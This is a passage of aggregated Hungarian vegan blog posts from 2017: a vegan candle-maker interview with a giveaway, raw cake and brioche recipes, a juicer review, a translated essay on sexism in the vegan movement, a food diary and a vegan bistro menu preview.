állattartás jelentett bevételt a családok számára. Ennek megfelelően szüleim is rengeteg “haszon”állatot tartottak, akiket vágóhidakra adtunk el. Tudtam és láttam Édesanyámon és Édesapámon is, hogy nehezen válnak meg az állatoktól, de nem volt más választásuk. Úgy éreztem, hogy elnyomják magukban mindazt, amit én is, hogy szeretem és sajnálom őket és nem akarom, hogy meghaljanak. De ekkor még csak gyanítottam, hogy, ami az elszállítás után történik velük, az nagyon nem etikus. Érettségi után Budapestre költöztem és szüleim sem tartottak már annyi állatot, ezért nem foglalkoztatott a dolog. Aztán 2005-ben került újra felszínre ez az egész, amikor megnéztem az akkori nagy kedvenc, az Antimaniax nevű osztrák zenekar I can’t smell my freedom című dalának videóját és ott minden eldőlt. Megláttam, hogy mi történik a színfalak mögött és eldöntöttem, hogy a kegyetlenséghez nem akarok többé hozzájárulni és hogy az állatok iránt érzett szeretetem sokkal erősebb az étkezési szokásaimnál. (A videó teljes valóságában mutatja be a nagyüzemi állattartás minden velejáróját és a vágóhidak rideg borzalmait, valamint az állatkísérleteket és a bőr-, szőrmeipar áldozatait.) Fokozatosan hagytam abba a húsevést, annak mindenféle állomását megjárva. 2006 tavaszán már egyáltalán nem ettem, utána pedig fokozatosan ismerkedtem meg az állatkísérletek nélkül készült kozmetikumokkal is, majd végül 2013-ban a növényi életmód mellett döntöttem, melynek köszönhetően először a tejtermékekre mondtam nemet, majd a tojásra is. Mindez azóta teljesen kihat az öltözködésemre és minden használati tárgyamra. Megnéztem a Making the Connection és az Earthlings filmeket, amik mind megerősítettek abban, hogy ez az én utam. Mindez azért fontos számomra, mert úgy érzem, hogy az állatok nem tudják magukat megvédeni és nem tudják tudtunkra adni a félelmeiket, a fájdalmukat. Megpróbálom őket képviselni és megmutatni, hogy a növényi életmód is lehet teljes. Az ember néha (sőt talán sokszor) csak felnőttként kap válaszokat bizonyos dolgokra. A vegán életmód egy nagyon hosszú folyamat eredménye az életemben, ezért soha nem várom el másoktól, hogy azonnal változzanak. Férjem néha eszik még húst, de látom rajta is a változást. Érzem, hogy már tudja Ő is, mennyi szenvedéssel jár a polcról leemelt virsli. Tejterméket már nem igazán fogyaszt, tojást is nagyon ritkán. Itthon egyáltalán nem főzünk állati eredetű ételeket. Miért gyertyákkal kezdtél foglalkozni, honnan jött az ötlet? A dekoratőr iskolában jöttem rá, hogy az állati eredetű dolgok nem csak az ételekben, a kozmetikumokban és az öltözködés terén jelennek meg az ember életében, hanem a dekorációk és a mindennapi használati tárgyak is sok ilyet tartalmaznak. Gondoljunk csak egy méhviasz gyertyára vagy egy helyes kis bőr fogantyúra a fiókon vagy egy kosáron, vagy ott vannak a kis szőrme kulcstartók, melyekről ma már tudom, hogy honnan származnak és hogyan készülnek. Rádöbbentem, hogy az állati eredetű termékek még a dekor szakmámat is képesek érinteni, ezért kutatni kezdtem a témában. A PETA ajánlását elolvasva jöttem rá, hogy tényleg valós a dolog, viszont tudok rajta változtatni. 2016-ban jött az illatgyertyák ötlete, amikor a boltban kapható paraffin alapú gyertyák helyett vegyszermentes megoldást kerestem, de mindenhol csak a méhviaszt ajánlották. Külföldi oldalakon kutakodva leltem az ECO szójabab viaszából készült gyertyákra és nagyon megtetszettek. Láttam, hogy máshol már évek óta nagy sikere van az így készült gyertyáknak, így hát belevágtam, először csak kiváncsiságból. Hogyan tanultad meg (mennyit kellett tanulni, volt-e valamilyen képzés, amit elvégeztél) a vegán gyertya készítést? Fórumokat böngészve kísérletezgettem itthon hónapokon keresztül, legtöbbször későn este. A hétközben kiöntött gyertyákat hétvégén tesztelgettem; figyeltem hogyan és mennyi ideig égnek, mennyi illatanyagra van szükség, hogyan viselkedik a viasz. Tulajdonképpen sok türelem és kitartás kellett, mint a legtöbb dologhoz az életben. Hány féle gyertyát készítesz jelenleg? Jelenleg háromféle illat vásárolható meg, de különböző csomagolást is kínálok hozzá. Lehet kapni ezüst színű tégelyben, kétféle kupakkal, de öntök gyertyát már üvegbe is. Tervezel termékbővítést? Ha igen, mi lesz a következő terméked? Igen, rengeteg tervem van. Tulajdonképpen egy óriási ötlet “vihar” dúl a fejemben szokás szerint, aminek még le kell tisztulnia. Nyáron mindenképpen megvásárolhatóak lesznek a jelenlegi illatok, de tervezek egy igazán frissítően citrusosat is, ami szuper társunk lesz a meleg kiülős estéken. Persze nagyon készülök az őszre is, hogy mire úrrá lesz rajtunk a “bekuckózós” hangulat, finom illatokkal tudjak előállni. Ildi blogja, a Greenwaydesign – weboldal – Facebook – Instagram Ildi gyertyái megvásárolhatok a weboldalán vagy emailen keresztül, valamint 2017. május 21-én a Kiskert Piacon és júniusban már a Vegan Sunday Marketen is találkozhatnak vele az érdeklődők. ***** NYEREMÉNYJÁTÉK!!! Nyeremény : Két darab gyertya (egy nyertesnek) – 1 db Fresh Start és 1 db Floral Fanatic (a legújabb virágmintás kupakkal). Írjátok meg ide a bejegyzés alá kommentben, hogy ti milyen illatban szeretnétek ilyen vegán gyertyát (melyik a kedvenc illatotok)! Szabályok : A kommentelésen felül plusz pontokért lájkolhatjátok a Greenway Design Facebook és Instagram oldalát (írjátok meg ezt is a kommentben, ha megtettétek). 2017. május 19-ig lehet játszani. Sorsolás a random.org-gal. Eredményhirdetés 2017. május 20-án. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyereményt a nyertesnek Ildi postázza magyarországi címre.
A negyedik születésnapi torta (nyers, vegán, gluténmentes)
2017. május 10. Zizi kalandjai
El sem hiszem, hogy a nagyobbik kisfiam, Ádi már négy éves lett! Tisztán emlékszem a születésének minden pillanatára, az első fogának kibújására, az első önálló lépéseire, amikor tíz hónapos kora körül elkezdődött az übercukiság időszaka, ami azóta is tart, csak most már kiegészül gondolkodással, értelemmel. Két gyerek anyukájaként látom most már, hogy minden gyerek más és más, nagyon különbözőek a testvérek is. Ádi is teljesen más gyerek, mint Ákos. Persze huncutságban, zsiványságban nincs akadály egyikőjüknél sem! Nagyon nehéz két zsivánnyal a mindennapokat “túlélni”, de ilyenkor Éva barátnőm szavai csengenek a fülemben: “Ezeket az éveket senki nem adja vissza nekünk! Töltsünk velük olyan sok időt, amennyit csak tudunk!” Ádi már magyarázó kiskrapek hihetetlenül jó humorral. Folyamatosan kérdez, nem győzünk a kérdéseire válaszolni és persze olyan kérdésekkel is bombáz, amire nem tudjuk a választ (gyorsan utánanézünk a neten, hogy képbe kerüljünk az adott témával kapcsolatban )! Nehéz vele lépést tartani, de igyekszünk. Imád kuktáskodni a konyhában, ezért is kapott egy ilyen szettet a ajándékba. A szülinapját megint csak a biopiacon ünnepeltük szűk családi és baráti körben, ahogyan tavaly is. Annyira szuper a helyszín, minden adott a piknikezéshez, rohangáláshoz, játszóterezéshez és finom ételekhez. Hasonló dolgokat készítettem, mint tavaly, olyanokat, amelyeket könnyű enni két rohangálás között gyerekeknek és felnőtteknek is. A tortát együtt választottuk ki Ádival. Az alaprecept a The Happy Pears srácoktól származik, kicsit módosítottam rajta. Az alapja magos-datolyás-vaníliás, középen van egy isteni karamell réteg, a tetején pedig egy egyszerű kókuszkrém. Igen, krém, bár többen az Instagram fotó alapján kókusztejszínhabnak gondoltátok. Nagyon-nagyon tömény torta, elég belőle egy vékony szelet. Nagy kapcsos formában készült, így bőven jutott mindenkinek. Nyers vegán karamell-kókuszkrém torta Mentés Nyomtatás Előkészítési idő 15 perc Főzési idő 1 óra Teljes idő 1 óra 15 perc Könnyen elkészíthető nyers vegán karamell-kókuszkrém torta. Tömény, de nagyon finom! Szerző: Zizi Recept típusa: sütemény, torta, nyers Konyha: vegán, gluténmentes Adag/mennyiség: 8-10 főre Hozzávalók Torta alaphoz: 100 g dió 100 g kesudió 105 g friss datolya, kimagozva (aszalt is jó, csak érdemes használat előtt egy fél órára langyos vízbe beáztatni, hogy könnyebben aprítsa a robotgép) 2 evőkanál extra szűz kókuszzsír 1 evőkanál kókuszreszelék ¼ teáskanál őrölt vanília Karamell krémhez: 375 g friss datolya, kimagozva aszalt is jó, csak érdemes használat előtt egy fél órára langyos vízbe beáztatni, hogy könnyebben aprítsa a robotgép) 180 g mandulavaj 9 evőkanál víz 4 evőkanál extra szűz kókuszzsír ½ teáskanál őrölt vanília késhegynyi só Kókusz krémhez: 2 konzerv kókusztej (jó minőségű, 60% kókusz tartalmú), használat előtt hűtőbe téve 2-4 órára 2 evőkanál agavészirup ¼ teáskanál őrölt vanília Tálaláshoz: friss eper Elkészítés Tegyük a diót és a kesudiót a robotgépbe és aprítsuk szemcsésre. Ekkor adjuk hozzá a datolyát, a szobahőmérsékletű kókuszzsírt, kókuszreszeléket, és vaníliát. Dolgoztassuk a gépet addig, amíg a torta alapunk összeáll tésztává. A tortaformát béleljük ki folpackkal vagy kenjük ki kókuszolajjal és nyomkodjuk az aljába a datolyás diós-kesudiós keveréket, majd tegyük a hűtőbe megkeményedni, amíg elkészítjük a többi réteget. Mossuk el a robotgép tartályát. Tegyük a mandulavajat, a datolyát, a szobahőmérsékletű kókuszzsírt, a vaníliát és a sót a robotgépbe. Kezdjük el dolgoztatni a gépet és lassan adagoljuk hozzá a vizet. Akkor van kész, ha karamell ízű és nyúlós az állaga, mint a karamellnek. Kenjük ezt a krémet (kicsit nehézkes a nyúlós állaga miatt) a datolyás diós-kesudiós alapra és tegyük vissza a hűtőbe. Vegyük ki a kókusztejet a hűtőből és bontsuk ki. A hideg hatására kettévált a sűrű krémes rész a vizestől. Kanalazzuk ki a krémet mindkét konzervből egy tálkába. A vizes részt tegyük hűtőbe és használjuk fel turmixok készítéséhez. Adjuk a krémhez az agavészirupot és a vaníliát, majd jól keverjük el és kanalazzuk a torta tetejére. Tálalásig tartsuk hűtőben (legalább 2 órát)! Tálaljuk friss eperrel! Jegyzetek 23 cm-es kapcsos tortaformában készült. Feltétlen jó minőségű minél magasabb zsírtartalmú konzerv kókusztejet használjunk ehhez a recepthez. Édesítésre agavészirupot használtam, hogy megmaradjon a krém fehér színe, de természetesen használhatunk juharszirupot, vagy datolyaszirupot is. Ebben az esetben a krém drapp, világosbarna színű lesz. 3.5.3226
Sana EUJ808 lényerőgép tesztelése
2017. április 27. Gitta nyersétel blogja
Juice-oljatok! Hű de milyen fura ezt leírni... magyarul készítsetek juice-okat, vagyis szűrt leveket! A turmix összekutyulja a zöldségeket, gyümölcsöket, benne hagyva a rostokat, ami nagyon jó, az is kell! De sokkal több tápanyagot tudunk felszívni a szűrt levekből, és sokkal többet tudunk belőlük meginni, épp a rostok nélküliségük miatt. Léböjt idején csak szűrt leveket iszunk. A hétköznapokban pedig reggelire zöld turmix, délután pedig uzsira egy nagy pohár zöldséglé! (hihetetlen, de próbáljátok ki, jól lehet lakni 5-6 dl szűrt lével) Milyen lényerő gépet vegyünk? Nehéz ezt eldönteni, mert mindegyik gépnek megvan az előnye és persze a hátránya is, és attól függ, hogy ki melyikkel tud megbarátkozni. Nekem a felültöltős lényerő gépek kedvesebbek, és nálam az is szempont, hogy nagy legyen a betöltő nyílás (ne kelljen apróra felvágni a zöldségeket) Két gépet már teszteltem, itt vannak az erről szóló bejegyzések: Kuvings b6000 lényerő gép tesztelése Sana EUJ707 lényerő gép tesztelése Nos, most ez is SANA, de míg a 707 típus vízszintes kiépítésű volt, ez most függőleges, vagyis felül van a betöltő nyílása, és nagy a betöltő nyílása :), ahogy a Kuvings gép is felültöltős, azt is nagyon szerettem használni. Nagyon tetszik, hogy külön kidobja a száraz anyagot, nem a gépen belül tárolja, hogy csak szétszedés útján lehessen kivarázsolni. jobbra megy a lé, balra a száraz rost anyagTöbbféle italt készítettem vele, nálunk majdnem minden nap van alma cékla répa , ez a kedvenc. Nem gyors, de ezt nem is hirdeti magáról, szépen komótosan összeroppantja a zöldségeket, és szinte teljesen száraz a pép, amit maga után hagy. (ellentétben a gyümölcscentrifugával) Szuper-mega-lájk a kifolyó csövön lévő elzárónak, ami lehetővé teszi, hogy csak akkor follyon ki a lé, amikor azt én akarom, és ha nincs alatta a kancsója, akkor ne csöpögjön össze-vissza. Nagyon szépen látszik a képen, hogy az ital még 15 perc után sem válik szét, vékony réteg hab van ugyan a tetején, de csak ennyi. Gyümölcslé készítése: nem csak a kemény zöldségekkel, de a puhább gyümölcsökkel is elbír, én ananászt is préseltem vele, és bírta, meg se kottyant neki. (bár a gyártó azt írja, hogy az érett gyümölcsöket kevésbé szereti) A szétszedése kicsit nehézkes, ebbe bele kell jönni. Elég sok alkatrészből áll, amit egyenként a csap alá kell tartani. De az elmondható, hogy ez így van mindegyik gyümölcspréssel. Amit viszont külön kiemelnék, hogy mosogató-barát. Vagyis szenzációs gyorsan és könnyen lehet végezni a mosogatással. Valahogy olyan anyagból készült, amiről egy szempillantás alatt lejön a cucc.. Összefoglalnám: Előnye: nagy betöltő nyílás, erős motor, kifolyó elzáró kupak, hab nélküli lé, gyors mosogatás, hatékony működés, szinte teljesen száraz a visszamaradó zöldségpép Hátránya: lassú (de ez egyben az előnye is, mert így kíméletesen nyeri ki a levet a zöldségekből, csak ki kell várni), és kicsit bonyolult a szétszerelés, összerakás (ezt viszont meg lehet tanulni, és be lehet gyakorolni) Nézzétek meg működés közben : Összességében egy jó kis masina, ajánlom mindenkinek szeretettel.
Csokicsipszes briós
Ezekből a brioche-okból egy falat sohasem elég. Még Londonban éltünk, amikor az utolsó hetekben egy nagyon finom, puha, csokicsipszes édes pékárut kóstoltam. Nem volt vegán, ami zavart is, de érdekelt, milyen az íze a francia "beütése" miatt is. Finom volt. Azóta is sok helyen látok. A legtöbb üzletnek van saját márkás "Brioche Chocolate Chips Rolls" zacskóba csomagolva. Általában 8 darab van benne, s elképesztő, milyen sok üres kalória van egyetlen "roll"-ban. Egy ilyen kis tekercs/hosszúkás zsömle akár 120-140 kalóriát is tartalmaz. Azért döbbenetes, mert éhségcsillapításra aztán cseppet sem alkalmas, inkább csak ennél még és még belőle. Nem csak vegánnal, de olyannal sem találkoztam, amibe legalább némi teljes kiőrlésű liszt van. Így hát nem hagyott békén a gondolat, hogy ezt nekem is ki kell próbálnom a saját utam szerint először is tojás és állati tej nélkül, másodszor a gyilkos fehér cukrot lecserélve egészségesebb édesítőre, harmadszor a fehér liszt egy részéhez teljes kiőrlésű és zabpehely lisztet keverve. No így már sokkal jobb volt. Így készült el a vegán csokicsipszes briosom vegán változata franciák után szabadon. Persze ebből is ennél még és még, de legalább valamivel egészségesebb hozzávalókkal készült. A recept Hozzávalók: - 2,5 dkg élesztő - 5 dl növényi tej - 10 dkg kókuszzsír + a tészta kenéséhez - 15 dkg fehér liszt - 15 dkg teljes kiőrlésű liszt - 10 dkg őrölt zabpehely - 2 ek nyírfacukor/nádcukor/kókuszvirágcukor, stb - 2 ek kevés vízben áztatott őrölt lenmag (tojás helyett) - csipetnyi só - vanília - étcsoki csipsz (vegán) Elkészítés: Egy tálba vagy a kenyérsütő üstjébe belemorzsoljuk az élesztőt, hozzáadunk 2 ek édesítőszert (nyírfacukrot használtam), majd felöntjük a kézmeleg növényi tejjel. Várunk 1-2 percet, majd a fenti sorrendben hozzáadjuk a többi hozzávalót, kivéve a csoki csipszeket. A dagasztás/kelesztés programon elindítjuk. Ennek híjával fakanállal vagy a kezünkkel úgy gyúrjuk össze a tésztát, addig dagasztjuk kezünkkel, míg a táltól az elválik és hólyagocskák jelennek meg a dagasztás során. Ha kézzel dolgoztunk, meleg helyen konyharuhával letakarva kelesztjük. A kenyérsütő a program szerint elvégzi ezt. A kész tésztát lisztezett deszkán kinyújtjuk, megszórjuk csoki csipszekkel, feltekerjük mint egy hengert, majd szeleteket vágunk belőle, amiket sütőpapíros tepsire fektetünk. Másik lehetőség, hogy vastagabb tésztát pogácsaszaggatóval kiszaggatunk, vagy apró zsömléket formázunk a tésztából. Persze tudom, a magyar pékségek briósa egészen másképp néz ki, mint az angol. Akár briósokat is csavarhatunk belőlük. Ez esetben vékonyabb rudakat kell vágni, majd felcsavarni. A tetejét egy pici folyékony kókusz-zsírral érdemes megkenni. Ettől fényesebb lesz. Közepes lángon megsütjük. A sütés utolsó 10 percében egy kis édes vaníliás növényi tejjel megkenhetjük. Ettől lesz kívül enyhén roppanós, belül puha.
Rákóczi túrós
2017. április 11. Beautilicious
Itt a húsvét, de a süteményeim már jól ismeri a család, így gondoltam, valami újjal fogok előrukkolni. Ennek céljából egy magyar klasszikust választottam, ami cseppet sem lett klasszikus, de nnál inkább egészséges és finom. Hozzávalók - baracklekvár tésztához: - 3répa - 300gr zabliszt - 4tojás - 60gr édesítő - 200gr tejföl - fél csomag sütőpor Túrókrémhez: - 500gr túró - 200gr tejföl - 40gr édesító - 1 citrom héja+leve - 2 tojássárgája Tetejére: - 4tojásfehérje - 3tk édesítő Így készítsd - A megtisztított répát reszeld le - Válaszd ketté a tojásokat - Add a sárgáját a répához - Ehhez tedd hozzá a tejfölt, majd alaposan keverd össze - Keverd össze a száraz alapanyagokat, majd add a répás keverékhez - Verd fel a tojásfehérjét, majd keverd a tésztába, úgy hogy ne törjön össze - A tésztát tedd sütőpapírral bélelt tepsibe, majd süsd míg elkészül a túrókrém - A túrókrémhez csak keverd össze alaposan a hozzávalókat - A tésztára kenj egy réteg lekvárt, majd mehet rá a krém - Süsd, míg a túrókrém szilárd nem lesz, majd vedd ki kenj rá egy réteg lekvárt és tedd rá a tojásfehérje habot, majd süsd míg szép színt nem kap a tojásfehérje hab.
Kedves újdonsült vegán!
[kép leírása: két félmeztelen, fehér, vékony, cisznemű nő, a testükre szaggatott vonalak vannak felfestve, és a testrészeik húsipari nevei, egyikük kezében tábla: minden állatnak ugyanolyan részei vannak] Kedves újdonsült vegán! Kapaszkodj, mert kicsit döcögős lesz az utad. Amikor vegánná válsz, az először nagyon stresszes és sokkoló élmény lehet. Megtanulod, hogy mit egyél, mit vegyél, hogyan bánj a barátaiddal és a családtagjaiddal, és, hogy hogyan kezeld az intenzív haragot és szomorúságot, amit akkor érzel, amikor tudatosul benned a más állatok szenvedése. Ezek közül egyik sem lesz könnyű, de kérlek, ne add fel, mert minél tovább kitartasz, annál könnyebb lesz. Megígérem, hogy mindez teljesen normálissá fog válni, méghozzá hamarabb, mint gondolnád. [tartalmi figyelmeztetés: szóba kerül a szexizmus és a nemi erőszak] Valószínűleg meg fogod keresni a vegán közösséget, hogy segítsenek a váltásban, és rengeteg jóbarátot fogsz köztük találni, és rengeteget fogsz tőlük tanulni. Megnyugtat majd, hogy nem vagy egyedül, és, hogy vannak mások is, akik annyira szenvedélyesen meg szeretnék változtatni a világot, mint te. Idővel viszont belátod majd, hogy vegánnak lenni egy dolog, de vegánnak lenni és nőként azonosítani magadat (1) teljesen más tészta. Ha épp párkapcsolatban élsz, lehet, hogy a párod ellenségesen fog reagálni a vegánná válásodra. Főként akkor, ha a társad férfiként azonosítja magát, a vegánságod kihívást jelent a férfiúi tekintélyére nézve. Lehet, hogy kijelenti, hogy sose tudnád őt megváltoztatni (akkor, is ha sose mondtál ilyet). Esetleg ragaszkodik hozzá, hogy főzz neki nem vegán ételeket, vagy menj vele nem vegán éttermekbe enni. Mivel nőként azonosítod magad, úgy érezheted, hogy nyomás nehezedik rád, hogy engedelmeskedj. A nőket kiskoruktól kezdve arra nevelik, hogy a férfiak érdekeit nézzék elsősorban. Ez nem jó, de így van – ne érezd magad rosszul, ha belemész. kép leírása: egy fehér, szemüveges kopaszodó férfi egy hamburgerbe harap, mellette egy fehér vörös nő dühös arccal szóra nyitja a száját Ha nőként azonosítod magad, ne csodálkozz, ha a magukat férfiként azonosító barátaidban is ellenérzéseket vált ki a vegánságod. Például egy jószándékú Facebook-poszt, amiben emlékezteted az olvasóidat, hogy a nem emberi állatoknak is számít az életük, könnyen olyan reakciókat válthat ki a férfiakból, miszerint a.) túl érzelgős vagy, b.) túl nagypofájú vagy, c.)meg vagy őrülve. Az érzelmességet, a véleményednek hangot adást és a szellemi betegségeket mind a nőkkel azonosították a történelem során. A nőket könnyű semmibe venni ha túl nőiesek, vagy nem eléggé nőiesek. Évszázadokon át hisztérikusnak skatulyázták be a nőket, és intézetekbe zártak minket, hogy elhallgattassanak. Sokszor nem tudod, hogy viselkedj: ne legyél túl nyápic, de ugyanakkor azért figyelj a hangnemedre és ne legyél túl agresszív. Látni fogod, hogy lehetetlen nekik eleget tenni, úgyhogy inkább csak tedd, amit teszel, és ne törődj velük. De a vegán nőként nem biztos, hogy itt véget érnek a nehézségeid. Ha úgy döntesz, hogy nem elég egyszerűen vegánnak lenned, és szeretnél aktivistaként is tenni az állatokért, valószínűleg még több férfiak által elkövetett agresszióval fogsz szembesülni. Mivel a vegán aktivisták többsége nő, ezért azt gondolhatod, hogy biztonságos hely neked. Sok szempontból persze az is, rengeteg női szolidaritással is találkozhatsz. Ugyanakkor a vegán mozgalom nagyon is a férfiak irányítása alatt áll. A férfiak vezetik a vegán aktivizmust – ők írják az elméletet, és ők döntik el, hogy milyen stratégia az elfogadható. Ők foglalják el a legtöbb helyet, és az ő hangjuk a leghangosabb. kép leírása: fehér, cisznemű férfi, vegán tanácsadás feliratú pólóban, mikrofonba beszél Ez a gyakorlatban azt jelenti, hogy sok nyomás fog rád nehezedni, hogy vagy csöndben, a színfalak mögött asszisztálj ezeknek a férfiaknak, vagy arra bátorítanak, hogy levetkőzz az egyes kampányok érdekében. Lehet, hogy nem kifejezetten a férfiak bíztatnak rá, hogy levetkőzz (a nők is sokszor részesek ebben), hanem a mozgalom patriarchális normái olyan környezetet teremtettek, ahol a nőktől elvárják, hogy szexuális tárgyak legyenek a az állatok érdekében. Talán elkezdesz arra gondolni, hogy mennyire felszabadító, hogy a jó ügy érdekében meztelen leszel. Ha ez jár az eszedben, akkor állj meg egy pillanatra, és gondold át! Jusson eszedbe, hogy csak vékony, fehér, cisznemű nőknek van megengedve, hogy az állatokért felszabadítsák magukat, és hogy a férfiakat szexuálisan felizgatni nem ugyanaz, mint izgatottá tenni őket a veganizmus ügyéért. Tapasztalaton alapuló kutatások tisztán mutatják, hogy a nők elnyomásának az alkalmazása nem állítja a befogadókat szembe az állatok elnyomásával. Sajnos sokszor találkozhatsz nők felé irányuló szexuális zaklatással és erőszakkal a mozgalmon belül. Nem akarlak megijeszteni, de ez így van, és ezért előre figyelmeztetlek. Nem sokszor beszélnek erről, de valójában eléggé elterjedt. Ha nő vagy, ne hagyd, hogy ez elriasszon, csak arra emlékezz, hogy a nem emberi állatok társadalmi igazságáért küzdeni nem ugyanaz, mint mindenkinek a társadalmi igazságáért küzdeni. Tulajdonképpen azok a férfiak, akik hirdetik, hogy érdeklik őket a nők, színes bőrű emberek és más hátrányosabb embercsoportok jogai, nos, ezek a férfiak ugyanolyan veszélyesek, mint azok, akik nem is tettetik, hogy mindez érdekli őket. Ha te férfiként azonosítod magad, felszólítalak, hogy állj ki a nőkért, és tedd a vegán helyeket biztonságosabbá. Úgy tűnik, a világ megváltoztatása bizony férfimunka. Ha nőként azonosítod magad, akkor valószínűleg ellenállásba fogsz ütközni, ha másként akarsz részt venni az eseményekben, mint a kávéfőzés, vagy a levetkőzés. De ennek nem kell így lennie. Ne hagyd el magad, maradj erős, hallasd a hangod, és követeld meg a tisztelelet. Ragaszkodj hozzá, hogy a vegánság pozitív, megerősítő élmény legyen. Ne hagyd, hogy egyeseknek az elnyomó mentalitása megakadályozzon a fontos munkában, amit elkezdtél. És ti, férfiak – mutassatok szolidaritást a nők iránt. Jól jön a segttségetek. U.i. Ha színes bőrű nő vagy, akkor még tovább kihívásokkal kell szembenézned. Fehér nőként nem ismerem ezeknek a kihívásoknak a kiterjedését, de anni biztos, hogy a vegán mozgalom elég gonosz színvak hely tud lenni néha- Mindenképpen nézz rá a Sistah Vegan Project oldalára. – Corey Lee Wrenn, M.S., A.B.D. Ph.D. magyar fordítás: tudatosvegan forrás: http://veganfeministnetwork.com/dear-new-vegan/ Lábjegyzetek 1. Ez a cikk a női élményről szól, beleértve a transz, interszex és genderqueer nőket is. Meg kell jegyeznünk viszont, hogy a transz, interszex vagy genderqueer vegánok további kihívásokkal találhatják magukat szemben a vegán mozgalmon belül. The post Kedves újdonsült vegán! appeared first on VegaNinja.
Ezt ettem ma 2017. március 17 péntek
2017. március 18. Gitta nyersétel blogja
Ma egy különleges nap volt. :) de úgy szép az élet, ha zajlik :) Reggelire a szokásos zöld turmix, most körtével, banánnal, chia maggal, goji bogyóval. a sűrű zöld turmix tetején látszik, hogy miket tettem bele. Itt már bele van keverve... állni hagytam 20 percet, utána ettem csak meg Utána tévéfelvételem volt, (M1), ahol (nem fogjátok elhinni, de) nyers ételeket készítettem, ráadásul különleges alapanyagokból, prémium zöldség és gyümölcs szárítmányokból. a kamera nem volt ehető, de ma a kamera kedvéért készítettem ételeket porból készült paradicsomleves :) avokádóval, csírákkalKészült paradicsomleves avokádóval, zöld turmix mandarinnal, piros turmix almával, magyaros pástétom, paradicsomos-zelleres pástétom (ezeket gluténmentes kenyér szeletekre kentük). Adás közben én végig kóstoltam, ettem, nagyjából ez volt az ebédem. zellerpor friss zöldségek lucerna por cékla por friss zöldségek magyaros pástétom zöldségporokból kenyérre kenve gyors szendvicskrém prémium szárítmányokból Uzsonnára, megettem a 2 nappal ezelőtti kesuhús maradékát sárgarépa rizzsel. Mindennek el kell fogynia :) Délután Civil rádió, két adásra való beszélgetést vettünk fel, és mire hazaértem, már jól megéheztem... saláta: ami az öntettől különleges Vacsorára egy tipikus hétköznapi vacsorát készítettem, a neve: amit_itthon_találsz_gyorsan_összevágod. A saláta öntet volt rajta különleges, ez bármilyen salátát feldob: 1 dl olaj (hidegen sajtolt), 1 citrom leve, 1 gerezd fokhagyma, 1 szeletke gyömbér. Mindezt sűrű krémszerűre turmixoljuk, és 1-2 evőkanállal teszünk a salátára. a többi megy egy jól zárható dobozban a hűtőszekrénybe. Ez az adag elég sok, fog jutni még a holnapi salátámra is. Volt még maradék lenmag kenyér, két szeletet ettem a salátához.
Nagyszerűen a Greatben....
Stőhr Grétával lassan 10 évre visszamenő az ismeretségünk... Amikor még alig voltak vega blogok a magyar neten, virtuálisan futottunk össze... aztán néhány évre rá együtt mentünk főzni a TV2-be. :) És azóta is időről időre összefutunk virtuálisan és most ismét nagy örömömre személyesen is. :) ... mert meghívást kaptam Grétáék szuper vegán bisztrójába a Great bisztróba egy degusztációs menü bemutatóra (hálás köszönet érte ezúton is, remek este, remek emberekkel! :). Hiszen a Bisztró, mely fennállása röpke ideje alatt eljutott oda a népszerűségi listán nagyszerű ételeinek köszönhetően, hogy délidőben gyakran az utcán állva kell bejutásra várni, most újabb lépcsőfokot lép felfelé. Elindul ugyanis az 'á la carte' esti vacsoralehetőséget kínáló éttermi opciója a bisztrónak. A külföldön már elterjedt gyakorlatot szeretnék Grétáék is megvalósítani, miszerint a reggel reggelizőként, délben önkiszolgáló bisztróként működő hely estére átalakul á la carte étteremmé. A most induló projekt részeként kb. 2 havonta fog változni az ételsor, mely 3 előételt, 3 levest, 3 főételt és 3 desszertet fog magában foglalni. A szűkebb választék azt a minőséget is hivatott szolgálni, mely így alkalmas lesz többek között a szezonalitásból eredő változások rugalmas követésére, a válogatott alapanyagok felhasználásával. A későbbi tervek között szerepel a vasárnap délelőttönkénti, akár családoknak is villás reggelit nyújtó kínálat és nyitvatartási idő hosszabbítás. A mostani á la carte lehetőség első alkalommal 2017. március 8-án (Nőnapon) vehető igénybe, 17-22h. Majd azt követően: március 11. (szombat): 12:00 - 22:00 március 15. (Ünnepnap): 12:00 - 22:00 AZ ÉTLAP (mely nem csak vegán, hanem egyben gluténmentes is): ELŐÉTELEK Club sandwich Karottás "lazac" remoulade mártással A bemutató vacsorán a degusztációs menü részeként megkóstolhattuk, és az íze olyannyira felidézte bennem a lazac általam nagyon-nagyon régen kóstolt ízét, hogy döbbenetes volt.... :) A sárgarépa 3 napig érlelődött egy sós és tengeri algás pácban, így nyerte el autentikus ízét. A hozzá kínált rizstejes majonéz ugyancsak szuper volt nem csak ízében, hanem állagában is! Ananászos kevert zöldsaláta sült - füstölt tofuval, vinaigrette öntettel Krémválogatás pirít?ssal, cruditevel - napraforgó pástétom - körözött - füstös padlizsánkrém LEVESEK Egzotikus kardamomos gyümölcsleves Thai citromfüves zöldségleves kókusztejjel Citrusos - joghurtos zellerkrémleves Elmondhatom, ilyen isteni zellerkrémlevest még életemben nem ettem! A citrom eszméletlenül a helyén volt benne, se túl sok, se túl kevés, hanem fantasztikusan megfelelő! :) FŐÉTELEK Sült teriyaki tempeh szarvasgombás fénygyökérpürével és marinált szezámos pak choi-jal Narancsos sütôtökös risotto Aszalt paradicsomos édesburgonyás gnocchi parmezánropogóssal A csak édesburgonyából és nem sima burgonyából készült alaptészta zabliszt hozzáadásával készült, egy fantasztikus paradicsomos szósszal. A parmezánropogós pedig kizárólag növényi sajtból. DESSZERTEK Pisztáciába, kókuszpehelybe, aszalt áfonyába forgatott álomgombóc válogatás narancsvirágvizes szója-joghurtöntettel Céklás - csokoládés brownie Mangós tiramisú Szerencsére a desszertek esetében Gréta úgy döntött, mind a hármat megkóstoltatja velünk... :P :D És hát nálam csodás krémességével, selymességével a Tiramisú krémje vitte a prímet. Szerintem meg nem mondta volna róla senki, hogy tojás és mascarpone nélkül készült! ;) Szóval, ha ünnepien jót szeretnétek enni, vegánul, vagy esetleg ételérzékenységek, allergiák miatt, ne hagyjátok ki ezt a remek lehetőséget! Ráadásul ezeken az Ünnep- és szabadnapokon akkor nem is kell otthon nekiállnotok főzni! ;) A Great Bisztró Facebook oldala: https://www.facebook.com/greatbistrobudapest/ Asztalfoglalás: 06702149072
Vegán szépségápolás – Perla Organic Skincare + Nyereményjáték
2017. március 2. Zizi kalandjai
